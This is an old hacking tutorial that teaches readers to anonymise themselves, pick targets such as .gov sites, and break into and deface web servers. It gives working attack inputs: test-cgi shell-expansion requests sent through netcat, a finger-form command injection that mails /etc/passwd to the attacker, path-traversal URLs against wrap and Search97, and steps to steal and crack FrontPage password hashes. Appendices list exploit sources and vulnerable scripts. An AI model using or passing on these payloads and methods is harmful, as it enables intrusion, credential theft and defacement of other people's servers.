-=Simple Ways of Web Page Hacking=-

It happens all the time, 100's of websites are defaced
or changed daily. I intend to show some of the ways of
doing this yourself here. This guide if I get a
favorable response will run until I've used all of my
material up. I've put sites with all the
files/programs used at the bottom in Apendix 1.

Stage 1 : Make sure your anonymous.

The worst thing you can do is go straight out and try
what is here without making sure your anonymous. You
need [and should have already] these:

An anonymous proxy server or two - Fully anon, no ip
address, no browser details. Get them for http - ports
8080, 3128, 8000. Socks - 1028.

A copy of SockCAP - This allows you to use any Win32
program through a SOCKS proxy. I don't know if a
program like this exists for linux or not.

A Wingate or two - Use these for telneting or ftp
anonymously.

A webased and therefore anonymous web based e-mail
account.

Stage 2 : Gather Information

To start with you need to find the web page you intend
to hack, I recommend using altavista to find a
suitable target. Do a URL: search to find pages in
that domain. For example URL: .gov would return
webpages which have a .gov domain.

When you have found a target do a dns lookup to find
out it's ip address - it's easy to do so I won't cover
it here. Then I recommend running what ever port
scanner you use to check it over. You need to find out
what services the server is running. You'll normally
get a list of ports , we only need to know if they are
running two : FTP which is port 21, http which is port
80 and finger which is port 70.

If they are running ftp telnet to them [telnet
www.target.com 21] and enter the command 'SYST' this
sometimes will return the OS type. I always try to do
an anonymous login - it's amazing how many dozy admins
have the anonymous/guest account with full
permissions.

User Anonymous

User Anonymous allowed, please enter full e-mail
address as password

Pass [normally blanked out]

Anonymous login allowed, access restrictions apply
[this means that it's not gonna work]

If you login and get the dir listing for / [root] you
don't have to bother with the rest of this guide, just
upload your own index.html file. I recommend renaming
the old file to index.old instead of deleting it.

Now it's a good idea to find out what's in the servers
cgi-bin. First try www.target.com/cgi-bin/ and
www.target.com/scripts/ in your web browser - you may
get a directory list, it's very unlikely but if you
are lucky it'll save you time later.

If you get nothing try the following urls in your
browser. These are only a few of the urls to try. See
Apendix 2 for a full list. You can get script kiddie
programs to do this for you. They are useful [if even
slightly lame] if you need to check a server quickly.

http://www.target.com/cgi-bin/test-cgi
[remote file listing]
http://www.target.com/cgi-bin/nph-test-cgi
http://www.target.com/carbo.dll
http://www.target.com/cgi-bin/perl.exe
http://www.target.com/scripts/CGImail.exe
http://www.target.com/cgi-bin/search97.vts
http://www.target.com/cgi-bin/finger
http://www.target.com/_vti_inf.html
http://www.target.com/wrap.cgi

If you get anything except a 400, 403 or 202 error
message then the server is running that service. I'll
go into detail about how to exploit that in the next
section. If you find the server is running either of
the test-cgi scripts then we can get a full file
listing of the cgi-bin, this enables us to know
exactly what the server is running. Heres how to do
it.

"GET /cgi-bin/test-cgi?/*" | netcat www.target.com 80

This sends a listing of the / [root] directories to
the target machines http conection - which we are
connected to :o)

We list the cgi-bin [or the dir where the scripts are]
by doing

"GET /cgi-bin/test-cgi?*" | netcat www.hackme.com 80

Again same thing. This exploit works because the
script does not enclose its arguments to the 'echo'
command inside of quotes, shell expansion is
therefore possible. Unfortunatly we can't escape to
the shell as it only effects the echo [ echo
QUERY_STRING = $QUERY_STRING ] string.

Stage 3 : Carry out the exploitation / defacement.

In this section your going to hear /etc/passwd and the
passwd file mentioned alot. If your new to *nix then
read the next section and I'll explain what it is.

The 'passwd' is the listing of accounts and passords
on a *nix machine. Their all encrypted but it can be
cracked [brute forced] quite easily.
The encryption is 'one way' this means that the
passwords can only be encrypted by the machine and not
decrypted by it. What the cracking program does it
encrypt a password from a dictionary file and compare
it to the already encrypted password in the passwd
file. If they match it's the right password.

A passwd file looks like this when opened in any text
editor:

root:D943/sys34:0:1:0000:/:
sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh
checkfsys:Locked;:0:0:check file
system:/usr/admin:/bin/rsh
john:chips11:34:3:john scezerend:/usr/john

It is always in the form :

userid:password:userid#:groupid#:GECOS field:home
dir:shell

What each of these fields mean
userid - the userid name, entered at login.
password - the password is written here in encrypted
form.
userid# - a unique number assigned to each user, used
for permissions.
groupid# - similar to userid#, but controls the group
the user belongs to.
GECOS FIELD - this field is where information about
the user is stored. Usually in the format full name,
office number, phone number, home phone. Also a good
source of information to guess/crack the passwd.
home dir - is the directory where the user goes into
the system.
shell - this is the name of the shell which is
automatically started for the login.

Some [most] of the time you will get a passwd file
that looks like this.

root:*:0:1:0000:/:
sysadm:*:0:0:administration:usr/admin:/bin/rsh
checkfsys:*;:0:0:check file system:/usr/admin:/bin/rsh
john:*:34:3:john scezerend:/usr/john

This is called a 'shadowed' passwd file. The passwords
are not entered in this file, instead it's a symbolic
link [a shadow of] of the actual passwd file which is
stored elsewhere. It's no use so give up and try
another exploit.

That's it for the passwd file.

You should by now have a list of what the server is
running. Cross referance this with your list of
exploits. Again see Apendix 1 for an url if you havn't
got them already. I'll go over finger, wrap,
search97.vts and frontpage extensions.

Finger - Connect to
http://www.target.com/cgi-bin/finger in your browser.
You'll probably be presented with a text box and a
html page.

You need to find out a VALID e-mail address for the
server first, it's easy to do just look for a
'contact' section on the webpage. Then you need to
type this in the txt [finger] box.

[email protected] ; /bin/mail [email protected] <
etc/passwd

Replace the e-mail addresses with the one you found
and your own [the anon one]. If it works you'll get
the /etc/passwd file in your mail. Then run a *nix
password cracker against it.

What the line above does it take the password file
through the e-mail address you found
[[email protected]] and sends it to your e-mail.

Wrap - This is one of the most simple exploits going.
Just enter this in your browser to view the contents
of /etc. You can then [sometimes] grab the /etc/passwd
file. Then all you need to do is run your *nix passwd
cracker on it.

http://www.target.com/cgi-bin/wrap?/../../../../../etc

You can replace the /etc and the number of /../ to get
different directories as well.

Search97.vts - Yet again this grabs the /etc/passwd
file. If the server you are trying to hack is running
Search 97 [or a variant of] then this should work.

Type this in your browser:

http://www.target.com/search97.vts?HLNavigate=On&querytext=dcm&ServerKey=Primary&ResultTemplate=../../../../../../../etc/passwd&ResultStyle=simple&ResultCount=20&collection=books

It looks really complex there but if we split it up a
bit it's quite simple.
http://www.target.com/search97.vts
?HLNavigate=On&querytext=dcm
&ServerKey=Primary
&ResultTemplate=../../../../../../../etc/passwd
&ResultStyle=simple
&ResultCount=20
&collection=books

The exploit code tells search 97 to do a search in the
books catergory and use a certain file as the template
for showing the results in. In this case /etc/passwd.
Instead of getting your search results you get the
passwd file displayed on screen.

Frontpage Extensions - Servers with the frontpage
extensions [counters etc] on them are exceptionally
vunerable, well what do you expect from Micro$oft?

The main frontpage extensions allow the main frontpage
program to connect to the server and alter pages on
it. It's part of the 'webs' tool. The extensions make
the server act like another directory on your
computer.

Normally this connection process has a password to
stop hackers from doing this, but as it is a Micro$oft
product that option is well hidden and out of sight.

So heres what we do:

First you must have a full copy of FrontPage

Now you need one of the proxies you got earlier. Once
you have this run front page.

Click Tools - Options - Proxy Settings - Settings, and
then put in the information of your proxy.

When you have it set up File - Open - then on the
msgbox click 'Web Folders'

Once you have done "Open File" folder icon at the top
right.

A msgbox will pop up, in that put the host name of
your site say www.target.com, then click add.

This might take a minute now what will happen is
either it will automatically add it and put you in
edit mode, a box will come up prompting you for a
username/password.

If you are in edit mode then you are in. If not carry
on.

Run your browser and go to
http://www.target.com/_vti_pvt/service.pwd
you will see something like username:g87ouLk098 if the
file is world readable. The "g87ouLk098" would be the
encrypted password.

Put this in to the same form as a unix passwd file.
For example


username:g87ouLk098:0:0:comments:/:/bin/bash

Save the file and crack the password, when you have it
got through the procedure again, this time putting in
the password you cracked.

By now you should have got somewhere into the server,
I'l have more next month including 4 more exploits,
intro to *nix hacking!!

-=Orky=-

Apendix 1 :

Exploits list : www.hack2600.com/remote/exp.html

More Exploits : www.rootshell.org,
www.securityfocus.com, www.hack2600.com

Cracking Programs - John the Ripper : www.hackers.com,
www.blackcode.com, www.wi2000.com, www.dhn.com

SocksCap - www.nec.com

Script Kiddie Programs : www.infowar.com/thc,
www.void.da.ru

Apendix 2 :

These are all exploits available on
www.hack2600.com/remote.

BNB Form
Campus.cgi
Classifieds.cgi
Count.cgi
EWS (Exite for webservers)
Fax
Survey.cgi
Glimpse HTTP
Handler.cgi
HTML Script
info2www
Perl.exe
PFDisplay
PHF PHP
Survey.cgi
Test-cgi
Textcounter.cgi
Uploader.exe
webdist.cgi
webgais
websendmail
wwwboard
wwwcount
Altavista Search (for businesses)
Anyform.cgi
Carbo.dll
ASP ads
Perfomer.cgi
CF 40
SGI-handler
Hyperseek
view-source
Irix (wrap)
Web site pro
www-sql
search 97.vts
wwwthreads
somecgi
convert-bas
http request_method
mini-sql 3.0
valueclick.cgi
responder
webcom-guestbook
whois-raw
webmin
Compaq Insight Manager
Newdsn and Getdrvrs
Win NT Counter
Index Server Exploit
IIS Showcode
Test.cgi and nph-test.cgi
RealMedia Server
formmail.pl
Shoping Carts
Domino 4.6
Coldfusion 4.0
guestbook.pl
PWS 3.0
Samba server
IIS Upgrade
IIS 1 and 2
CGIC
Any Form (eg *.pl)
Cgimail.exe